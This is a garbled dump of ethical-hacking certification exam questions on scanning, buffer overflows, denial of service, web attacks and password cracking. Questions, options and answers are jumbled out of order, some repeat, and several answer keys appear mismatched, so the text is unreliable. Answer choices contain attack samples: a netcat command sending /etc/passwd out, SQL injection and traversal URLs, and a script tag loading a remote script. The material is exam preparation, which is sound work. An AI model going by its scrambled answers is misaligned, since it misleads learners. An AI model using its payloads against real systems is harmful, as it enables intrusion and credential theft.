Char Bytes D. QUESTION 556: Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks? A. streadd() D. IP Routing or Packet Dropping C. EIP B. Unicode Bytes Answer: A QUESTION 558: In Buffer Overflow exploit. Change the IP on Angela's Computer to an address outside the firewall B. What is this technique called? A. EEP Answer: A Explanation: EIP is the instruction pointer which is a register. IP Fragmentation or Session Splicing B.C QUESTION 557: When writing shellcodes. Root Bytes C. Whisker and Nessus have session splicing capabilities. A. it points to your next command. IP Splicing or Packet Reassembly Answer: A Explanation: The basic premise behind session splicing. Change the settings on the firewall to allow all incoming traffic on port 80 C.an error message stating that the page can't be reached. her computer can't ping the education website back. Since Angela's computer is behind a corporate firewall. This payload can be delivered in many different manners and even spread out over a long period of time. Null Bytes B. The datagram is not reassembled until it reaches its final destination. strcat() C. Change the settings on the firewall all outbound traffic on port 80 D. it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education's server. After handing the issue over to her company's IT department. IDS Spoofing or Session Assembly D. which of the following registers gets overwritten with return address of the exploit code? A. you must avoid _________________ because these will end the string. strcpy() B. strscock() Answer: A. QUESTION 559: 71 . EAP D. What ca Angela's IT department do to get access to the education website? A. and other tools exist in the wild.B. Currently. Use a Internet browser other than the one that Angela is currently using QUESTION 554: This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and the IDS will not spot the true nature of the fully assembled datagram. ESP C. She contacts the website's support team and they report that no one else is having any issues with the site. is to deliver the payload over multiple packets thus defeating simple pattern matching without session reconstruction. or IP Fragmentation. It would be a processor-intensive tasks for an IDS to reassemble all fragments itself and on a busy system the packet will slip through the IDS onto the network.

If the two numbers p and q are discovered through a _________________ process.168.1 > victim: ip-proto-25 0 (ttl 48.802216 eth0 < 192.10 17:34:45. id 47066) 17:34:46.10 QUESTION 82: An nmap command that includes the host specification of 202.111982 eth0 < 192.1. id 32834) 17:34:46. which are used in the RSA PKI mathematical process. 2 B. then the private key can be derived. nmap -sR 192.112143 eth0 < 192.1.1 > victim: ip-proto-74 0 (ttl 48. nmap -sV 192. nmap -sO -T 192. id 35585) 17:34:46. Digitally signing SSL Certificates C.10 B. Hashing D. 256 C.10 D. Brute-forcing QUESTION 565: Microsoft Authenticode technology is used for: A.* will scan _______ number of hosts.1.1 > victim: ip-proto-117 0 (ttl 48.168.1. Over 10.1. Prime Detection C. id 51058) tcpdump-vv -x host 192. Digital Signing Activex controls B. C++ D.802163 eth0 < 192.1.1.1.1. Assembly Language QUESTION 561: One of the most common and the best way of cracking RSA encryption is to being to derive the two prime numbers.168.168. Factorization B.56-57.168. id 26292) 17:34:46.168.1.1 > victim: ip-proto-162 0 (ttl 48.168.802266 eth0 < 192.731739 eth0 < 192.168. id 36166) 17:34:45.168.1.1.112092 eth0 < 192. Java B.168.1.10 C.000 QUESTION 129: What type of attack is shown in the above diagram? 72 .112039 eth0 < 192. tcpdump-vv host 192. A.1. 512 D.1 > victim: ip-proto-117 0 (ttl 48.168. Digitally Signing Java Applets QUESTION 569: Study the log below and identify the scan type.176.Which programming language is NOT vulnerable to buffer overflow attacks? A.168.1 > victim: ip-proto-162 0 (ttl 48. id 42060) 4500 0014 a44c 0000 3b82 57b8 c0a8 010a c0a8 0109 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 A.10 > victim: ip-proto-130 0 (ttl 59. ActiveX C. A. nmap -sS 192. id 33796) 17:34:45.1 > victim: ip-proto-25 0 (ttl 48.168. Digitally Signing JavaScript Files D.168.10 17:35:06.

HFS B. E Notice the last 8 characters are the same QUESTION 168: What file system vulnerability does the following command take advantage of? typec:\anyfile. Backdoor access Answer: B QUESTION 169: Attackers can potentially intercept and modify unsigned SMB packets. Man-in-the-Middle (MiTM) Attack Answer: D Explanation: A man-in-the-middle attack (MITM) is an attack in which an attacker is able to read. SSL Spoofing Attack B. Multiple Domain Traversal Attack D. 44EFCE164AB921CQAAD3B435B51404EE C. ADS C. Hexcode Attack B. 0182BD0BD4444BF836077A718CCDF409 D. Session Hijacking Attack D. Cross Site Scripting C. Identity Stealing Attack C. NTFS D. E52CAC67419A9A224A3B108F3FA6CB6D Answer: B. B757BF5C0D87772FAAD3B435B51404EE F. insert and modify at will.exe A. modify the traffic and forward it so that the server might perform undesirable actions. A. CEC52EB9C8E3455DC2265B23734E0DAC E.A. Which of the following is NOT a means that can be used to minimize or protect against such an attack? A. Alternatively.exe > c:\winnt\system32\calc. BA810DBA98995F1817306D272A9441BB B.exe:anyfile. Unicode Directory Traversal Attack Answer: D QUESTION 147: Which of the following LM hashes represent a password of less than 8 characters? (Select 2) A. Timestamps 73 . QUESTION 130: Study the following log extract and identify the attack. the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. messages between two parties without either party knowing that the link between them has been compromised.

Create rules in IDS to alert on strange Unicode requests. A large number of SYN packets appearing on a network without the corresponding reply packets. you might be required to look through multiple web pages online which can take a long time. 419 D. Use wget to download all pages locally for further inspection. Axent's NetRecon (http://www. C. Configure Web Server to deny requests involving Unicode characters. Use get() to download all pages locally for further inspection. C.com/script./. SARA. by Advanced Research Organization (http://www-arc. D. D. he went through a few scanners that are currently available.. C. File permissions D. The source and destination port numbers having the same value.B. Phone B./ 2. %70%61%73%73%77%64 = passwd How would you protect information systems from these attacks? A. B.com/sara) 3.bindview. The signature for SYN Flood attack is: A. Enable Active Scripts Detection at the firewall and routers. Here are the scanners that he uses: 1.. Use mget to download all pages locally for further inspection. QUESTION 284: Scanning for services is an easy job for Bob as there are so many tools available from the Internet. P2P Networks QUESTION 269: You work as security technician at Certkiller . Use SSL authentication on Web Servers. B. VLAD the Scanner. QUESTION 236: What is the most common vehicle for social engineering attacks? A.com/tools/) However. Use get* to download all pages locally for further inspection. While doing web application testing. 44 B. In order for him to check the vulnerability of Certkiller . %65%74%63 = etc 3. Email C.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63 The request is made up of: 1.example. SMB Signing C. The source and destination address having the same value.. A large number of SYN packets appearing on a network with the corresponding reply packets. there are many other alternative ways to make sure that the services that 74 . by Razor (http://razor. 88 C.axent.com. D.com) 2. 487 QUESTION 230: SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections. B. %2e%2e%2f%2e%2e%2f%2e%2f% = . Sequence numbers monitoring QUESTION 206: What port number is used by Kerberos protocol? A. In person D. QUESTION 275: Take a look at the following attack on a Web Server using obstructed URL: http://www. %2f = / 4./. Which of the processes listed below would be a more efficient way of doing this type of validation? A.

A White Box test F. An action or event that might prejudice security C. It's a technique used to discover Wireless network on foot B. Continuously survey the area for wireless devices. Bob wants to validate whether SQL Injection would be possible. Bob notices that the site is dynamic and infers that they mist be making use of a database at the application back end. Using the default port and OS to make a best guess of what services are running on each port for Certkiller . their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department. Double Quote C. It's a technique used to discover interface in promiscuous mode D. B. Exclamation Mark QUESTION 328: Bob reads an article about how insecure wireless networks can be. and have invested considerable resources in protecting their Internet exposure. It's a technique used to discover what rules are configured on a gateway QUESTION 450: A client has approached you with a penetration test requirements. Disable all wireless protocols at the firewall. What other steps does Bob have to take in order to successfully implement this? (Select 2 answer. B. Using Cheops-ng to identify the devices of Certkiller . They are concerned with the possibility of external threat. What would be the best method to accurately identify the services running on a victim host? A. D. However. What is the first character that Bob should use to attempt breaking valid SQL requests? A. It's a technique used to map routers on a network link C.) A. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for Certkiller . What kind of penetration test would you recommend that would best address the client's concern? A. D. A Black Hat test C. Disable SNMP on the network so that wireless devices cannot be configured. QUESTION 424: What is the purpose of firewalking? A. He gets approval from his management to implement a policy of not allowing any wireless devices on the network. C. A Black Box test B. QUESTION 303: Bob has been hired to do a web application security test. The loss potential of a threat B. A Grey Hat test E. An agent that could take advantage of a weakness D. C. Using the manual method of telnet to each of the open ports of Certkiller . A White Hat test QUESTION 460: Which of the following best describes Vulnerability? A. Semi Column B. Single Quote D. A weakness or error that can lead to compromise QUESTION 465: Bill has started to notice some slowness on his network when trying to update his 75 . A Grey Box test D. Train users in the new policy.have been scanned will be more accurate and detailed for Bob.

Bill knows that none of his customers are in Panama so he immediately thinks that his company is under a Denial of Service attack. SAMBA D. but the help desk manager says that he has not. The user said he stepped away from his computer for only 15 minutes and when he got back. FINGER Answer: A QUESTION 482: Paula works as the primary help desk contact for her company. but the Blue screen looks like a familiar one that Paula had seen a Windows 2000 Computers periodically. Now Bill needs to find out more about the originating IP Address. Paula knew this should not be the case since the computer should be completely frozen during a Blue screen. There was IRQ conflict in Paula's PC D. Nmap scan with the P (ping scan) switch D. While doing a port scan she notices ports open in the 135 to 139 range. You are able to detect few convention open ports. the Blue Screen was there. Which of the following scan options can help you achieve this? A. While attempting to perform conventional service identification by connecting to the open ports. Paula's Netwrok was scanned using Dumpsec C. Nessus sacn with TCP based pings B. What protocol is most likely to be listening on those ports? A. Bill decides to use Geotrace to find out where the suspect IP is originates from. Paula walks over to the user's computer and sees the Blue Screen of Death screen. Nmap with the O (Raw IP Packets switch 76 . Paula also noticed that the hard drive activity light was flashing meaning that the computer was processing some thing. Bill asks the help desk manager if he has received any calls about slowness from the end users. What Internet registry should Bill look in to find the IP Address? A. Paula's Network was scanned using FloppyScan B. The Geotrace utility runs a traceroute and finds that IP is coming from Panama. APNIC QUESTION 481: Samantha has been actively scanning the client network for which she is doing a vulnerability assessment test. ARIN C. FTP C. Netcat scan with the switches C. LACNIC B. The user's computer is running Windows XP. the scan yields either bad or no result. Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death screen and he ca no longer work. RIPELACNIC D.company's website while trying to access the website from the Internet. As you are unsure of the protocols in use. She checks the network IDS live log entries and notices numerous nmap scan alerts. SMB B. What is Paula seeing happen on this computer? A. Bill receives a number of calls from customers that can't access the company website and can't purchase anything online. you want to discover as many different protocols as possible. Tool like Nessus will cause BSOD Answer: A QUESTION 483: You are scanning the target network for the first time. He also notices that almost all the traffic is originating from a specific address. Bill logs on to a couple of this routers and notices that the logs shows network traffic is at all time high.

Check all of the following that could be a likely cause of the lack of response? A. Inc is a software development company located in Los Angeles. Dumps SAM password hashes to pwd. including its password policies.Answer: D QUESTION 484: Jack is conducting a port scan of a target network. however that the new password policy requires that everyone must have complex passwords with at least 14 characters. It uses a community string sent as clear text Answer: A. Dumps Active Directory password hashes to pwd. ICMP is filtered by a gateway D. The security breach was discovered when customers complained about the usage of their credit cards without their 77 . Michael has just logged on to one of the network's domain controllers and is about to run the following command: What will this command accomplish? A. The host might be down B. Password history file is piped to pwd. servers and devices about performance or health status data. The destination network might be down F. How did this attack occur? The intruder entered through an employees home machine. which was connected to Spears Technology. Hackers have used this protocol for a long time to gather great amount of information about remote hosts.txt B. Internet cache file is piped to pwd. Michael was only able to enforce a password group policy in Active Directory with a minimum of 10 characters. Michael wants to ensure that everyone is using complex passwords that meet the new security policy requirements. He knows that his target network has a web server and that a mail server is up and running. The packet TTL value is too low and can't reach the target Answer: A. He has informed the company's employes. Spears Technology found this attack to be so to law enforcement officials to protect their intellectual property. Due to certain legacy applications.txt D.C. California. Which of the following features makes this possible? A. The TCP window Size does not match E. UDP is filtered by a gateway C.F QUESTION 493: SNMP is a protocol used to query hosts. Inc's corporate VPN network.txt C.000 address containing customer credit cards and password. Michael has been charged with strengthening the company's security policies.txt QUESTION 506: Spears Technology. They reported a breach in security. Jack has been sweeping the network but has not been able to get any responses from the remote target. "The hackers had accessed and downloaded 90. stating that its "security defenses has been breached and exploited for 2 weeks by hackers.D QUESTION 504: Michael is the security administrator for the for ABC company. It is susceptible to sniffing B. It uses TCP as the underlying protocol C. The application called BEAST Trojan was used in the attack to open a "Back Door" allowing the hackers undetected access. It is used by ALL devices on the market D.E.

John become suspicious and views he firewall logs and he notices huge SSL connections constantly hitting web server. He looks up the IDS log files and sees no Intrusion attempts but the web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever.knowledge. but can guess the correct responses. Disable VPN access to all your employees from home machines B. Session Hijacking attacks B. Web Page defacement attacks D. Recently his Web Server has been under constant hacking attacks. Hackers have been using the encrypted HTTPS protocol to send exploits to the web server and that was the reason the IDS did not detect the intrusions. This sequence number is predictable. Inc exchange for ransom. The attack doesn't see the SYN-ACK (or any other packet) from the server. The passwords allowed the hackers to access Spears Technology's network from a remote location. records the sequence number chosen and then opens a second connection from a forget IP address. The hackers were traced back to Beijing China through e-mail address evidence. IDS and firewall on his network. the server will respond (SYN-ACK) with a sequence number of its choosing. The credit card information was sent to that same e-mail address. What attacks can you successfully laugh against a server using the above technique? A. The intent of the attacker was to steal the source code for their VOIP system and "hold it hostage" from Spears Technology. Ping of Death QUESTION 528: After a client sends a connection request (SYN) packet to the server. Allow VPN access but replace the standard authentication with biometric authentication C. which then must be acknowledge (ACK) by the client.536 bytes. The tool size of this ICMP packet once reconstructed is over 65. Fraggle C. what type of attack is Bryce attempting to perform? A. QUESTION 523: Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. the attack connects to a service first with its own IP address. the attacker can use the one-side communication to break into the server. Replace the VPN access with dial-up modem access to the company's network D. IP Spoofing Attacks QUESTION 555: John runs a Web Server. How would Jon protect his network form these types of attacks? A. The hackers had intended on selling the stolen VOIP software source code to competitors. Install a hardware SSL "accelerator" and terminate SSL at this layer C. Install a proxy server and terminate SSL at the proxy B. SYN Flood D. Smurf B. If the source IP Address is used for authentication. Denial of Service attacks C. How would you prevent such attacks from occurring in the future at Spears Technology? A. Enable the firewall to filter encrypted HTTPS traffic QUESTION 567: Which of the following encryption is not based on Block Cipher? 78 . From the information given. posing as employees. Enable 25 character complex password policy for employees to access the VPN network. Enable the IDS to filter encrypted HTTPS traffic D.

Question: 140 In an attempt to secure his 802. There are two job postings for network and system administrators. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building’s center. Ulf’s network is safe. He places the antenna for the access points near the center of the building. An understanding of the number of employees in the company C. AES D. Use wget to download all pages locally for further inspection. B. While doing web application examing.com. It does not require a computer in order to commit a crime. There is a problem with the shell and he needs to run the attack again. The types of operating systems and applications being used. Use get() to download all pages locally for further inspection. D. He first attempts to use the “Echo” command to simply overwrite index. How can this help you in footprint the organization? A. Question: 185 Why is Social Engineering considered attractive by hackers and also adopted by experts in the field? A. The IP range used by the target network B. C. It is easy and extremely effective to gain information. Ulf’s network will be safe but only of he doesn’t switch to 802. C. How can this help you in footprint the organization? A. Ulf decides to use a strategic antenna positioning. An understanding of the number of employees in the company 79 . He then attempts to delete the page and achieves no progress.11a. The system is a honeypot. Question: 122 You work as security technician at Examsheets. B. Wireless signals can be detected from miles away. It is done by well known hackers and in movies as well. Use mget to download all pages locally for further inspection. Blowfish C. You notice that they have jobs listed on a few Internet job-hunting sites. The HTML file has permissions of ready only.A. QUESTION 118 You are gathering competitive intelligence on an Certkiller . C. With the 300 feet limit of a wireless signal. Which of the following statements is true? A. There are two job postings for network and system administrators.11b wireless network. C. RC4 Question: 118 You are gathering competitive intelligence on an Examsheets. The IP range used by the target network B. There is a large parsheets lot and outlying filed surrounding the building that extends out half a mile around the building.net. Ulf’s network will not be safe until he also enables WEP. Ulf figures that with this and his placement of antennas. DES B. B.net. D.html and remains unsuccessful. What is the probable cause of Bill’s problem? A. B. You cannot use a buffer overflow to deface a web page. Finally. You notice that they have jobs listed on a few Internet job-hunting sites. Use get* to download all pages locally for further inspection. his wireless network will be safe from attack. How strong the corporate security policy is D. he tries to overwrite it with another page again in vain. Ulf’s network is not safe. D. D. Which of the processes listed below would be a more efficient way of doing this type of validation? A. It is not considered illegal. He has been able to spawn an interactive shell and plans to deface the main web page. Question: 153 Bill has successfully executed a buffer overflow against a Windows IIS web server. you might be required to look through multiple web pages online which can take a long time.

B. IDS. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan. Use wget to download all pages locally for further inspection. PICNIC. APNIC. Compare the file's virus signature with the one published on the distribution media QUESTION 590: In the context of Trojans. ARIN. LACNIC B. B. C. Firewall. RIPE NCC. A tool used to encapsulated packets within a new header and footer. Sniffer. How strong the corporate security policy is D. APNIC D. Use get* to download all pages locally for further inspection. Search in Google using the key strings "the target company" and "newsgroups" B. Which of the choices below indicate the other features offered by Snort? A. Use mget to download all pages locally for further inspection. As an ethical hacker. C.com. QUESTION 119 Your Certkiller trainee Sandra asks you which are the four existing Regional Internet Registry (RIR's)? A. content inspector -------------------------------------------------------DUPT---------------------------QUESTION 596: System Administrators sometimes post questions to newsgroups when they run into technical challenges. Use NNTP websites to search for these postings D. Which of the following options would indicate the best course of action for John? A. Sniffer C. ARIN.google. The types of operating systems and applications being used. NANIC. While doing web application testing. IDS. LACNIC. However. Use get() to download all pages locally for further inspection QUESTION 149 Snort is an open source Intrusion Detection system. what is the definition of a Wrapper? A. As the application comes from a site in his untrusted zone. it can also be used for a few other purposes as well. Packet Logger. RIPE NCC. Search in Google using the key search strings "the target company" and "forums" QUESTION 594: John wants to try a new hacking tool on his Linux System. Which of the processes listed below would be a more efficient way of doing this type of validation? A. Sniffer B. Proxy D. LATNIC QUESTION 122 You work as security technician at Certkiller . How would you search for these posting using Google search? A. you might be required to look through multiple web pages online which can take a long time. D. John wants to ensure that the downloaded tool has not been Trojaned. ARIN. IDS. Obtain the application via SSL B. Search for the target company name at http://groups.com C. D. Obtain the application from a CD-ROM disc C. APNIC.C. RIPE NCC. Compare the files' MD5 signature with the one published on the distribution media D. An encryption tool to protect the Trojan. QUESTION 589: Smurf is a simple attack based on IP spoofing and broadcasts. Sniffer. A single packet (such 80 . APNIC C. IDS. A tool used to bind the Trojan with legitimate file. ARIN. you could use the information in newsgroup posting to glean insight into the makeup of a target network.

The Hacker attempted Session Hijacking. then used SQL injection to gain access to valid login IDs D. LibPCAP 81 . John Stevens is in charge of information security at Bank of Timbukut. instead money was transferred between accounts. Customers can access their account balances. A properly configured gateway D. C. wwwroot D. In order to use this tool on the Windows Platform you must install a packet capture library. Who are the primary victims of these attacks on the Internet today? A. all the responses will get sent to the spoofed IP Address. Which of the following tools would allow you to detect unauthorized changes or modifications of binary files on your system by unknown malware? A. PCAP B. har. money hasn't been removed from the bank. what is the hacker really trying to steal? A. QUESTION 517: Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. then logged in to receive a session ID. Strangely. in which the hacker opened an account with the bank. The bank has deployed a new Internet-accessible Web Application recently. SAM file C. Mail Servers are the primary victim to smurf attacks D. regional financial institution in Timbuktu. Repair file QUESTION 536: Bank of Timbuku is a medium-sized. By spoofing the source IP Address of the packet. John Stevens reviewed the Web Application's logs and found the following entries. All the machines on that subnet respond to this broadcast. transfer money between accounts. The Hacker first attempted logins with suspected user names. Anti-Virus Software C.After one month in production. SPAM filters are the primary victim to surf attacks QUESTION 588: Virus Scrubbers and other malware detection program can only detect items that they are aware of. IRC servers are the primary victim to smurf attacks B. What kind of attack did the Hacker attempt to carry out at the Bank? A. the account balances of many of the bank's customers had been changed ! However.as an ICMP Echo Request) is sent as a directed broadcast to a subnet on the Internet.txt B. The Hacker used a generator module to pass results to the Web Server and exploited Web Application CGI vulnerability. Thus. Brute Force attack in which the Hacker attempted guessing login ID and password from password cracking tools B. What is the name of this library? A. There is no way of finding out until a new updated signature file is released QUESTION 584: Based on the following extract from the log of a compromised machine. guessed the next ID and took over Jason's session. several customers have complained about the Internet enabled banking application. IDS devices are the primary victim to smurf attacks C. Given this attack profile. File integrity verification tools B. a hacker can often flood a victim with hundreds of responses for every request the hacker sends out. NTPCAP C. pay bills and conduct online financial business using a web browser.

Install hardware keylogger on her computer. FTP B. D. A pseudo account that has no username and password D. Perform multiple queries through a search engine C. A user that has no skills B. Spoof the source IP address. what is a 'null' user? A. Go through the rubbish to find out any information that might have been discarded QUESTION 490: You are conducting an idlescan manually using HPING2. How can you modify your scan to prevent triggering this event in the IDS? A. An account that has been suspended by the admin C. A pseudo account that was created for security administration purpose QUESTION 421: Given the following extract from the snort log on a honeypot. During the scanning process. Which of he following options would be a possible reason? A. One or two of the queries cause the IPID to increment by more than one value. These ports are actually open on the target system D.D. B. Scan more slowly. WinPCAP QUESTION 165: In the context of Windows Security. They report that they are under a denial of service attack.regardless of the port being queried. C. B. Install screen capturing Spyware on her computer. Only scan the Windows systems. Enable Remote Desktop on her computer. the smurf attack event stops showing up on the organization's IDS monitor. you notice that almost every query increments the IPID. He was able to get off early… A. ------------------------------------------TUNGH--QUESTION 401. Scan the range of IP address found in their DNS database D. Telnet D. C. The Zombie you are using is not truly idle C. A stateful inspection firewall is resetting your queries QUESTION 570: While performing ping scans into a target network you get a frantic call from the organization's security team. SMTP QUESTION 467: Which of the following activities would not be considered passive footprinting? A. Search on financial site such as Yahoo Financial B. what service is being exploited? : A. Do not scan the broadcast IP. SSH C. 82 . Harold just got home from working at Henderson LLC where he works as an IT technician. When you stop your scan. Hping2 can't be used for idlescanning B.

Social Engineering D. OTP D. QUESTION 402 StackGuard (as used by Immunix). Software keylogger D. Install VNC on her computer. Spoofing Identity C. A. Covert keylogger B. Security token B. Biometric device C.D. Hardware keylogger QUESTION 404 Jack Hacker wants to break into Brown Co. and Microsoft’s /GS option use ______ defense against buffer overflow attacks. Canary B. Reverse Engineering QUESTION 405 Joseph has just been hired on to a contractor company of the Department of Defense as their Senior Security Analyst… A.’s computers and obtain their secret double fudge cookie recipe. ssp/ProPolice (as used by OpenBSD). Hex editing C. Stealth keylogger C. Non-executing stack QUESTION 403 Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products? A. Faking Identity B. Format checking D. A. Proximity cards 83 . Reverse Psychology E.

0. Tripwire B. Machine A Machine B. Machine A: netcat –l –e magickey –p 1234 < testfile Machine B: netcat < machine A IP> 1234 C. Nessus C. Machine A : netcat –l –p –s password 1234 < testfile Machine B : netcat < machine A IP > 1234 B. Use cryptcat instead of netcat QUESTION 407 Harold has just been hired on as the senior network administrator for the University of Central Michigan… A. Sequence number 82980070 Acknowledgement number 17768885 B. Machine A: netcat –l –p 1234 < testfile –pw password Machine B: netcat <machine A IP> 1234 –pw password D. SATAN QUESTION 408 You are trying to hijack a telnet session from a victim machine with IP address 10. SAINT D.QUESTION 406 An attacker runs netcat tool to transfer a secret file between two hosts. A.0. Sequence number 17768729 Acknowledgement number 82980070 84 .5 to Cisco A.

Block ICMP at the firewall D. Block UDP at the firewall C. Block TCP at the firewall B. PERM. QUESTION 411 Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign. FIN Scan QUESTION 410 Harold works for jacobson Unlimited the IT department as the security manager. Harold should have used Dumpsec instead of Pwdump6 C. CACLS. You want to prevent attackers from running any sort.exe D. Stealth Scan B. Null Scan D. NTPERM.exe C. Harold’s dictionary file was not large enougn D.exe B. XMAS Scan C.C. or modify ACLs. There is no way to completely block tracerouting into this area. LanManger hashes are broken up into two 7 character fields B. A. A. Sequence number 87000070 Acknowledgement number 85320085 D.exe QUESTION 412 You are the security administrator for a large network. 85 . CLACS. Harold should use LC4 instead of john the Ripper. A. Sequence number 82980010 Acknowledgement number 17768885 QUESTION 409 Which type of scan does not Open a full TCP connection? A. display.

11a D. Unicode Traversal Attack QUESTION 417 Steven the hacker realizes the network administrator of Acme Corporation is using syskey in Windows 2000 Server to protect his resources A. It informs the cracker of which vulnerabilities he may be able to exploit on your system.) D. A. alert tcp any any -> any any 21 (content:”user root”.) QUESTION 416 Kevin has been asked to write a short program to gather user input for a web application. It doesn’t depend on the patches that have been applied to fix exitsting security holes. Wireless signals can be detected from QUESTION 414 Fingerprinting at Operating System helps a cracker because: A. Bob’s network will not be safe until he also enables WEP B. alert ftp -> (content:”user password root”. QUESTION 415 Which of the following snort rules look for FTP root login attempts? A. alert tcp -> any port 21 (msg:”user root”. Bob’s network is safe C. 40-bit encryption 86 . Bob decides to use strategic antenna positioning. B. Format String Attack D.) B. Bob’s network will be safe but only if he doesn’t switch to 802. D. With the 300-foot limit of a wireless signal. SQL injection Attack C.) C. alert tcp -> any port 21 (message:”user root”.QUESTION 413 In an attempt secure his 802. Cross Site Scripting. A. It opens a security-delayed window based on the port being scanned C. It defines exactly what software you have installed B. 11b wireless network.

B. 87 .B. A. C. Single key authentication C. Use ClosedVPN B. 128-bit encryption D. It’s a technique used to map routers on a network link. Shared key authentication D. Hashing D. He shuts down all unnecessary ports and services. Use Monkey shell C. Brute-forcing QUESTION 419 John has a proxy server on his network which caches and filters web access. Use HTTPTunnel or Stunnel on port 80 and 443 QUESTION 420 Jackson discovers that the wireless AP transmits 128 byte of plaintext. and the station responds by encryting the plaintext. It’s a technique used to discover Wireless network on foot. No authentication B. A. Prime detection C. Factorization B. It’s a technique used to discover interface in promiscuous mode. Use reverse shell using FTP protocol D. 64-bit encryption C. Open system authentication QUESTION 421 What is the purpose of firewalking? A. 256-bit encryption QUESTION 418 One of the most common and the best way of cracking RSA encryption is to begin to derive the two prime numbers. A.

A. He cannot spoof his IP and successfully use TCP D. 121-231 D. B. The server and the client . SMURF Attacks QUESTION 426 88 . He needs to use an automated tool to telnet in C. It’s a technique used to discover what rules are configured on a gateway QUESTION 422 An attacker is attempting to telnet into a corporation’s system in the DMZ.D. A. He is attacking an Operating system that does not reply to telnet even when open QUESTION 423 You want to carry out session hijacking on a remote server.. 121-371 E. 120-321 B. 200-250 QUESTION 424 Once an intruder has access to a remote system with a valid username and password. the attacker will attempt to increase. A. LAND attacks B. Give user the least amount of privileges QUESTION 425 Attacker forges a TCP/IP packet. which causes the victim to try opening a connection with itseft. Give users two passwords C. SYN Flood attacks D. Targa attacks C. Give users tokens B. This causes the system to go into an infinite loop trying to resolve this unexpected connection. packet #120 A. The firewall is blocking port 23 to that system. 120-370 C. Give users a strong policy document D.

Loads the /etc/passwd file to the UDP port 55555 C.com/search.com/script. IDS.asp?lname=smith%27%3bupdate%20usertable%20set %20password%3d%27AxOr%27%3b--%00 D..Since Daryl’s backgrounds is in web application development.xsecurity. The Ploblem Daryl is having A. However.victim. Sniffer C.com/example?accountnumber=67891&creaditamount=99999999 B. Firewall. it can also be used for a few other purposes such as a sniffer.php?mydata=%3csript%20src=%22http%3a%2f %2fwww. IDS. http://www. Sniffer D. John the Ripper D.myserver./bin/ls%20-al C.cOm%2fbadscript. Sniffer. deletes the /etc/passwd file when connected to the UDP port 55555 QUESTION 428 Daryl is a network administrator working for Dayton Technologies. Packet Logger. Password Sniffer B. IDS. content inspector 89 . http://www. Proxy B. A.Identify SQL injection attack from the HTTP requests shown below: A..com/cgiin/bad.cgi?foo=.myserver. Logs the incoming connections to /etc/passwd file B. http://www.js%22%3e%3c%2fscript%3e QUESTION 427 What does the following command in netcat do? Nc 55555 < /etc/passwd A. LOphtCrack C. Grabs the /etc/passwd file when connected to UDP port 55555 D. WinHttrack QUESTION 429 Snort is an open source Intrusion Detection System. IDS. http://www. Sniffer.yourserver.%fc%80%80%80%80%af.

Someone that has an urge to constantly hack C. 443 QUESTION 431 What does the term ‘Hacktivism’ means? A. Snow B. 139 C. Someone who subscribe to hacker’s magazine D. EFS QUESTION 434 SSL has been seen as the solution to a lot of common security problems. 445 B.QUESTION 430 NetBIOS over TCP/IP allows files and/or printers to be shared over the netword. Your firm represents many important clients whose names always must remain anonymous to the public. 179 D. File sneaker D. Stealth IE C. Administrator will often time make use of SSL to encrypt communications from point A to point B. File snuff C. A. Someone who is hacking for a cause B. Stealth Anonymizer B. You are trying to intercept the traffic from a victim machine. she went to mandatory security A. Stealth Firefox D. Cookie Disabler QUESTION 433 You are IT manager of large legal firm in California. On Monday. A. 90 . Someone who has at least 12 years of hacking experience QUESTION 432 Stephanie works as a records clerk in a large office building in downtown Chicago.

Hybrid Attack B. None of the above QUESTION 436 Why would an attacker want to perform a scan on port 137? A. Firewalls cannot inspect traffic coming through port 80 91 . Firewalls can only inspect outbound traffic C. Block port 25 at the firewall B. To check for file and print sharing on Windows systems D. Bod has followed all the for securing the operating system and IIS. A. Firewalls cannot inspect traffic coming through port 443 B. Encryption Attack D. A. SSL will mask the content of the packet and Intrusion Detection System are blinded D. SSL will trigger rules at regular interval and force the administrator to turn them off C. Switch from Windows Exchange to Unix Sendmail D. To discover proxy servers on a network B. you discover that people are able the telnet into the SMTP server on port 25 A. Dictionary Attack C. To disrupt the NetBIOS SMB service on the target host C.A.0. Shut off the SMTP service on the server C. SSL is redundant if you already have IDS’s in place B. Brute Force Attack QUESTION 438 Bob has set up three web server on Windows Server 2003 IIS 6. SSL will slow down the IDS while is it breaking the encryption to see the packer contend QUESTION 435 While examining audit logs. To discover information about a target host using NBTSTAT QUESTION 437 You have retrieved the raw hash values from a Windows 2000 Domain Controller.

By using SQL injection B. Cryptography is used to secure data from specific threats. By using cross site scripting C. Idle Scan 92 . Firewalls cannot inspect traffic at all. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error C. Bob can explain that using a weak key management technique is a form of programming error B. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique D. By changing hidden form values in a local copy of the web page D.D. A. There is no way the attacker could do this without directly compromising either the web server or the database QUESTION 441 Why type of port scan is shown below? A. Bob can explain that a random number generator can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error QUESTION 440 An attacker has been successfully modifying the purchase price of items purchased at a web site. they can only block or allow certain ports QUESTION 439 Bob has a good understanding of cryptography. The security administrators verify the web server and Oracle database have not been A. having worked with it for many years.

